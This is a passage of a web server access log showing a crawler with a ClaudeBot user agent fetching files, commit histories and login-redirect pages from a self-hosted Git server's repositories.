AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fnginx.conf" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fcomponents%2FServices.tsx" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/pip3" [Client 216.73.216.188] [Length 951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 9823] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 9832] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/pip" [Client 216.73.216.188] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 216.73.216.188] [Length 967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" [Client 216.73.216.188] [Length 9857] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py?display=rendered" [Client 216.73.216.188] [Length 10883] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" [Client 216.73.216.188] [Length 11704] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 216.73.216.188] [Length 11774] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" [Client 216.73.216.188] [Length 11707] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images" [Client 216.73.216.188] [Length 9780] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fpip3.12" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/index.html?display=rendered" [Client 216.73.216.188] [Length 10870] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom1.png?display=rendered" [Client 216.73.216.188] [Length 11057] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py?display=rendered" [Client 216.73.216.188] [Length 10890] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" [Client 216.73.216.188] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom6.png?display=rendered" [Client 216.73.216.188] [Length 11058] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json?display=rendered" [Client 216.73.216.188] [Length 10885] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fnpm" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj%2FOpcUaMinimal.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" [Client 216.73.216.188] [Length 9860] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12?display=source" [Client 216.73.216.188] [Length 11793] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" [Client 216.73.216.188] [Length 11680] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html?display=rendered" [Client 216.73.216.188] [Length 10877] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" [Client 216.73.216.188] [Length 11705] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 216.73.216.188] [Length 11201] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom5.png?display=rendered" [Client 216.73.216.188] [Length 11054] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json?display=rendered" [Client 216.73.216.188] [Length 10891] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 2167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 216.73.216.188] [Length 10496] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 216.73.216.188] [Length 12566] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 216.73.216.188] [Length 13326] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 216.73.216.188] [Length 11058] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 9835] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 957] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:15 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/$%7BgetInvestingUrl(symbol)%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 216.73.216.188] [Length 11053] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fmail_contact.py" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fnginx.conf" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 216.73.216.188] [Length 11221] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2Ftemplates%2Ffavicon.ico" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 216.73.216.188] [Length 11217] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Flib64" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fupdate_status.py" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fcomponents%2FFooter.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fassets%2Fjs" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fupdate_status.py" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj%2FOpcUaMinimal.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr 